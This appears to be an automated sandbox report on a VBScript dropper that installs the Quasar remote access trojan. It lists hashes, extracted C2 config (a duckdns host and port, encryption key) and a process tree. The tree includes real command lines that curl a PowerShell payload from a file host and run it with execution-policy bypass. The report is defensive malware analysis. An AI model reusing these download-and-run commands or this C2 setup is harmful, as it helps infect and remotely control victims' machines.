Analysis

  • max time kernel
    160s
  • max time network
    208s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2023, 07:46

General

  • Target

    vb.vbs

  • Size

    1024KB

  • MD5

    ea33785b5feaade952b2768dc1b74d6d

  • SHA1

    2611ef2ca512873963550e03e8da3761a3f827da

  • SHA256

    664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82

  • SHA512

    63745e2ee17ab5cca44eb46c5e7faecc7d2e38831d87c61262d9f4fb8d55d3891d1d9f49443dc07825273c5ca973ab3f6e964b1dae2191fd0cd306cf8a7fae35

  • SSDEEP

    12:O+h3awpefnYj5H6NPnqkc+h3awpeZ9nF6NPnJ:O+9xYM5wqh+9xYZly

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4780
        • C:\Windows\system32\curl.exe
          curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
            PID:4792
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4628
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1644

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\rr.ps1

      Filesize

      5.1MB

      MD5

      7aad8bcb11ff3deab23cc311222fe265

      SHA1

      3d9a69c71e00aff947af949441220f18bad9e0d8

      SHA256

      c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a

      SHA512

      f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

    • memory/1644-150-0x00000000075A0000-0x0000000007606000-memory.dmp

      Filesize

      408KB

    • memory/1644-149-0x00000000062E0000-0x0000000006392000-memory.dmp

      Filesize

      712KB

    • memory/1644-148-0x0000000005860000-0x00000000058B0000-memory.dmp

      Filesize

      320KB

    • memory/1644-147-0x00000000066D0000-0x0000000006CE8000-memory.dmp

      Filesize

      6.1MB

    • memory/1644-146-0x00000000052E0000-0x00000000052EA000-memory.dmp

      Filesize

      40KB

    • memory/1644-145-0x0000000005350000-0x00000000053E2000-memory.dmp

      Filesize

      584KB

    • memory/1644-144-0x0000000005900000-0x0000000005EA4000-memory.dmp

      Filesize

      5.6MB

    • memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp

      Filesize

      528KB

    • memory/4628-143-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

      Filesize

      10.8MB

    • memory/4628-140-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

      Filesize

      10.8MB

    • memory/4628-138-0x0000019043090000-0x00000190430B2000-memory.dmp

      Filesize

      136KB